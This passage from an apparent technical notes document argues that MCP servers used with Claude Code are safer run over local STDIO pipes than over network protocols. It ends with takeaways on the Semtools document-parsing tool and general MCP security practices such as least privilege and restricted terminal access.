❌ TCP/IP overhead (headers, checksums, etc.) ❌ Network serialization overhead ❌ Potential network latency and jitter ❌ Additional memory copies through network buffers ❌ Network interface driver overhead ``` ### Key Architectural Principle **The fundamental security principle is**: > **"If communication doesn't need to cross machine boundaries, don't use protocols designed for that purpose."** This means: - Use **IPC mechanisms** (pipes, domain sockets) for local communication - Use **network protocols** only when actually communicating across networks - **Default to the most restrictive communication mechanism** that meets your needs - **Network exposure should be explicit and intentional**, never accidental ### Why "Local IPC Suffices" for MCP MCP (Model Context Protocol) communication typically involves: 1. **Same-machine processes**: Claude Code and MCP server run on same computer 2. **Parent-child relationship**: Claude Code spawns and manages MCP server 3. **Request-response pattern**: Simple command/response communication 4. **No remote access needed**: No legitimate need for network accessibility 5. **Process lifecycle coupling**: MCP server should die when Claude Code exits All of these requirements are perfectly served by **local IPC** (specifically STDIO pipes), while **network protocols** add zero value but create massive security risk. ### The Bottom Line **STDIO mode eliminates network attack surface entirely by operating below the OSI network layers.** Instead of using protocols designed for internet communication, it uses OS-level process communication that cannot be accessed remotely. This is why the security guidance consistently recommends STDIO mode: **it's not just "more secure" - it makes entire categories of attacks physically impossible.** ## Key Takeaways ### Semtools - Powerful combination of AI-powered document parsing and semantic search - Requires proper API configuration but provides excellent text extraction - Semantic search finds contextually relevant content beyond keyword matching - Outputs are well-structured and preserve document formatting ### MCP Security - Terminal access should be avoided or heavily restricted - Multiple layers of security are essential - Stdio mode is safer than network mode - Always apply principle of least privilege - Structured APIs are preferable to raw command execution ## Resources - **LlamaParse API**: https://api.cloud.llamaindex.ai - **Semtools**: Installed via `cargo install semtools` - **MCP Documentation**: Model Context Protocol specifications - **Security Best Practices**: Container isolation, permission controls, audit logging --- *Document created: 2025-09-06* *Tools tested: semtools v1.2.1, Rust 1.89.0*